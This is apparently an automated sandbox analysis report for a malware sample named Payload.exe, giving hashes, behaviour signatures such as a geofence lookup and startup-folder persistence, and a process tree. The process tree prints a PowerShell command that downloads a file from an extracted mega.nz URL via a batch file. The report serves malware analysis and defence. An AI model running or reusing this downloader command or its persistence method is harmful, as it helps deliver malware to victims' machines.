Analysis
  max time kernel: 149s
  max time network: 153s
  platform: windows10-2004_x64
  resource: win10v2004-20230220-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 05-04-2023 22:37
Behavioral task: behavioral1
  Sample: Payload.exe
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: Payload.exe
  Resource: win10v2004-20230220-en
General
  Target: Payload.exe
  Size: 27KB
  MD5: b4dad0a0467d3a0c9621ca1c7794c707
  SHA1: 61800bf88b4878d44f7accc79860c4aee482e5cb
  SHA256: 7c2a477d02ba0822602b27a761edf1a8370d595e487fa0351e42d0765844561e
  SHA512: 6d2880136ff05b51025cc345daf1f1b23ec5d04a0b7809b306dfd93fab4664335b832b6f4060db44b59a3c410213d4da133d56aaf588f22bd164187a7a9f1a65
  SSDEEP: 384:vLbmd21qBNOaLNOF0TEdQIeCP1BBvMl7AQk93vmhm7UMKmIEecKdbXTzm9bVhca/:Dyd2u0cqKl7A/vMHTi9bD
Malware Config
  Extracted URL: https://mega.nz/file/CmZVzTzA#zNDfRZPSgAbtlolk0MfG2yD_ABN4riwqzWuFsRS5XqI
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Processes:
    description: Key value queried
    ioc: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation
    process: Payload.exe
- Drops startup file (1 IoC)
  Processes:
    description: File created
    ioc: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
    process: Payload.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid / process):
    1120 Payload.exe (64 events)
- Suspicious use of AdjustPrivilegeToken (36 IoCs)
  Processes (description / pid / process), in recorded order:
    Token: SeDebugPrivilege 1120 Payload.exe
    Token: 33 1120 Payload.exe alternating with Token: SeIncBasePriorityPrivilege 1120 Payload.exe (7 pairs)
    Token: SeDebugPrivilege 2336 powershell.exe
    Token: 33 1120 Payload.exe alternating with Token: SeIncBasePriorityPrivilege 1120 Payload.exe (10 pairs)
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description / pid / process / target process):
    PID 1120 wrote to memory of 2704: Payload.exe -> cmd.exe (3 events)
    PID 2704 wrote to memory of 2336: cmd.exe -> powershell.exe (3 events)
Processes
- C:\Users\Admin\AppData\Local\Temp\Payload.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
  - Checks computer location settings
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\URL.bat" "
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell (new-object System.Net.WebClient).DownloadFile('https://mega.nz/file/CmZVzTzA#zNDfRZPSgAbtlolk0MfG2yD_ABN4riwqzWuFsRS5XqI','C:\ProgramData\https://mega.nz/file/CmZVzTzA#zNDfRZPSgAbtlolk0MfG2yD_ABN4riwqzWuFsRS5XqI');
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\URL.bat
  Filesize: 342B
  MD5: ba24d1a1e004ff429e414026ade4dc4b
  SHA1: 098d72b925cfa75ffea85433a79329fdcdc1d3db
  SHA256: 1dec770f0da84ea92ec65a17b540d625a041223bbf918142e03f4ad060e93b8b
  SHA512: 9a0f209e8b3c70b4f38e19d20c160f6f4df20456e6c6a0101d873d2177693124fe0901d21ff5e2bcef654d06299d80bb92068e6c174d3f738112528c27c44eb2
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aokaftjh.pgm.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Memory dumps (path / filesize):
  memory/1120-133-0x0000000001CF0000-0x0000000001D00000-memory.dmp  64KB
  memory/1120-136-0x0000000001CF0000-0x0000000001D00000-memory.dmp  64KB
  memory/1120-166-0x0000000001CF0000-0x0000000001D00000-memory.dmp  64KB
  memory/1120-165-0x0000000001CF0000-0x0000000001D00000-memory.dmp  64KB
  memory/2336-146-0x0000000005450000-0x00000000054B6000-memory.dmp  408KB
  memory/2336-145-0x0000000004670000-0x0000000004680000-memory.dmp  64KB
  memory/2336-143-0x0000000004C80000-0x0000000004CA2000-memory.dmp  136KB
  memory/2336-147-0x00000000054C0000-0x0000000005526000-memory.dmp  408KB
  memory/2336-144-0x0000000004670000-0x0000000004680000-memory.dmp  64KB
  memory/2336-157-0x0000000005B30000-0x0000000005B4E000-memory.dmp  120KB
  memory/2336-158-0x0000000007360000-0x00000000079DA000-memory.dmp  6.5MB
  memory/2336-159-0x0000000006030000-0x000000000604A000-memory.dmp  104KB
  memory/2336-142-0x0000000004CB0000-0x00000000052D8000-memory.dmp  6.2MB
  memory/2336-141-0x0000000004580000-0x00000000045B6000-memory.dmp  216KB